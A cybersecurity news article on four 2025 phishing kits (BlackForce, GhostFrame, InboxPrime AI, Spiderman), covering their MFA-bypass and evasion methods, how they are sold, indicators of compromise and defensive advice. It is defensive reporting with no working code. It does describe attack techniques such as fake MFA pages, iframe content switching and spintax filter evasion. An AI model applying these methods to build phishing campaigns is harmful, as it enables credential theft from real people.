New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale

Four sophisticated phishing kits—BlackForce, GhostFrame, InboxPrime AI, and Spiderman—have emerged in 2025, employing AI assistance and MFA bypass techniques to steal credentials from thousands of users worldwide. Researchers report these toolkits are being actively marketed on messaging platforms for prices ranging from $234 to $1,000.

Cybersecurity experts warn these kits represent a significant evolution in phishing attacks, lowering barriers to entry for cybercriminals while dramatically increasing the scale and sophistication of credential theft operations. The tools specifically target banking, streaming, and corporate credentials across multiple regions, with a focus on European financial institutions.

How the new phishing kits work

BlackForce, first detected in August 2025, has quickly evolved through multiple versions and targets over 11 major brands including Disney, Netflix, DHL, and UPS. Selling for €200-300 ($234-351) on Telegram forums, this toolkit employs advanced evasion techniques and Man-in-the-Browser (MitB) attacks to capture login credentials and bypass sophisticated multi-factor authentication systems.

"BlackForce features several evasion techniques with a blocklist that filters out security vendors, web crawlers, and scanners," according to Zscaler ThreatLabz researchers Gladis Brinda R and Ashwathi Sasi.

The attack sequence begins when victims click malicious links redirecting them to convincing fake websites. Once credentials are entered, they're instantly transmitted to attackers through Telegram bots and control panels. When victims receive legitimate MFA prompts, BlackForce displays fake MFA pages that capture authentication codes, giving attackers full account access.

After completing the attack, victims are redirected to legitimate websites, leaving no evidence of compromise. The kit employs "cache busting" techniques by using JavaScript files with unique hashes, forcing browsers to download the latest malicious script rather than using cached versions.

GhostFrame, discovered in September 2025, uses a different approach focused on stealth. Its architecture centers on a seemingly harmless HTML file that conceals malicious behavior within an embedded iframe leading to phishing login pages targeting Microsoft 365 and Google accounts.

"The iframe design also allows attackers to easily switch out the phishing content, try new tricks or target specific regions, all without changing the main web page that distributes the kit," explained Barracuda researcher Sreyas Shetty.

This kit generates random subdomains with each visit and employs anti-analysis techniques preventing browser inspection. It has already facilitated over one million phishing attempts while evading traditional security solutions.

Technical indicators of compromise

Security professionals should be aware of these common indicators that may signal these new phishing toolkits in action:

• Unusual iframe implementations with dynamically changing content
• Random subdomain generation patterns
• JavaScript files with unique hash parameters
• Telegram webhook API calls embedded in page source
• MFA interception pages that closely mimic legitimate authentication screens

AI automation takes phishing to new levels

InboxPrime AI represents perhaps the most concerning advancement, leveraging artificial intelligence technology previously reserved for legitimate enterprise applications to automate mass phishing campaigns. Available as a malware-as-a-service subscription for $1,000, it provides perpetual licenses and source code access through a Telegram channel with over 1,300 members.

"It is designed to mimic real human emailing behavior and even leverages Gmail's web interface to evade traditional filtering mechanisms," according to Abnormal researchers Callie Baron and Piotr Wojtyla.

The platform offers a professional interface resembling legitimate email marketing software, allowing criminals to manage accounts, proxies, templates, and campaigns with ease. Its most powerful feature is an AI-powered email generator that creates convincing phishing lures tailored to specific industries, languages, and communication styles.

Additional capabilities include:

• Real-time spam diagnostics that analyze emails for filter triggers and suggest corrections
• Sender identity randomization and spoofing to customize Gmail display names
• Spintax support to create email variations that bypass signature-based detection

"This industrialization of phishing has direct implications for defenders: more attackers can now launch more campaigns with more volume, without any corresponding increase in defender bandwidth or resources," warned Abnormal Security.

European banks under targeted attacks

The fourth kit, Spiderman, specifically targets European financial institutions and government portals. Unlike the others marketed on Telegram, Spiderman's seller operates through Signal messenger with approximately 750 members.

"Spiderman is a full-stack phishing framework that replicates dozens of European banking login pages, and even some government portals," Varonis researcher Daniel Kelley reported.

The kit creates pixel-perfect replicas of banking sites from institutions including Blau, CaixaBank, Deutsche Bank, ING, Volksbank, Klarna, and PayPal, with primary targets in Germany, Austria, Switzerland, and Belgium.

Spiderman captures cryptocurrency wallet seed phrases, intercepts one-time passwords and PhotoTAN codes, and gathers credit card information through multi-step attacks specifically designed for European banking systems where credentials alone are insufficient for transactions.

"After capturing credentials, Spiderman logs each session with a unique identifier so the attacker can maintain continuity through the entire phishing workflow," Kelley explained.

Banking sector vulnerabilities

European financial institutions face unique challenges with these attacks due to:

• Multi-layered authentication processes that are now being systematically bypassed
• PhotoTAN and chip-based authentication systems specifically targeted by Spiderman
• Highly regionalized banking interfaces being replicated with precision
• Customer trust in official communication channels being exploited

The evolving threat landscape

These four kits join an expanding list of phishing frameworks developed over the past year, including Tycoon 2FA, Salty 2FA, Sneaky 2FA, Whisper 2FA, Cephas, and Astaroth. Security researchers have recently observed hybrid attacks combining techniques from multiple kits.

ANY.RUN recently documented a Salty-Tycoon hybrid that bypasses detection rules tuned to either kit individually. This development coincided with a sharp drop in Salty 2FA activity in late October 2025, with the hybrid using early-stage techniques from Salty 2FA before loading code that mimics Tycoon 2FA's execution.

"This overlap marks a meaningful shift; one that weakens kit-specific rules, complicates attribution, and gives threat actors more room to slip past early detection," ANY.RUN reported.

As these phishing toolkits continue to evolve, organizations must understand the various types of phishing attacks and their distinctive characteristics to implement appropriate defensive measures.

How to protect yourself and your organization

Given the sophistication of these new phishing kits, individuals and organizations should implement multiple layers of protection:

• Enable phishing-resistant MFA methods like hardware keys when available, as they cannot be intercepted like SMS or app-based codes
• Verify website URLs carefully before entering credentials, looking for subtle misspellings or unusual domains
• Use password managers that can detect when legitimate sites are being impersonated
• Implement email security solutions that can detect AI-generated content
• Train employees to recognize phishing attempts, especially those claiming to be about invoices or password resets
• Deploy security tools that can detect iframe-based attacks and domain-switching techniques

The rapid evolution of these phishing kits demonstrates how cybercriminals continue to industrialize their operations, making sophisticated attacks accessible to less technical threat actors. With AI now automating customized phishing campaigns, organizations must remain vigilant and adapt their security strategies accordingly.

Enhanced defensive strategies

Beyond the standard recommendations, organizations should consider these advanced protection measures against the latest phishing toolkits:

• Implement email authentication protocols like DMARC, SPF, and DKIM to prevent domain spoofing tactics used by InboxPrime AI
• Deploy browser isolation technology that renders web content in a secure container, protecting against BlackForce and GhostFrame's browser-based attacks
• Utilize AI-based security solutions that can detect anomalous login attempts and suspicious session behaviors indicative of MFA bypass attempts
• Establish robust incident response procedures specifically for credential theft, including rapid account lockdown capabilities and predetermined communication channels for security alerts

According to the SANS Internet Storm Center, organizations experiencing these advanced phishing attacks should immediately implement network monitoring for Telegram API calls and suspicious iframe loading patterns to detect compromise attempts before credentials are exfiltrated.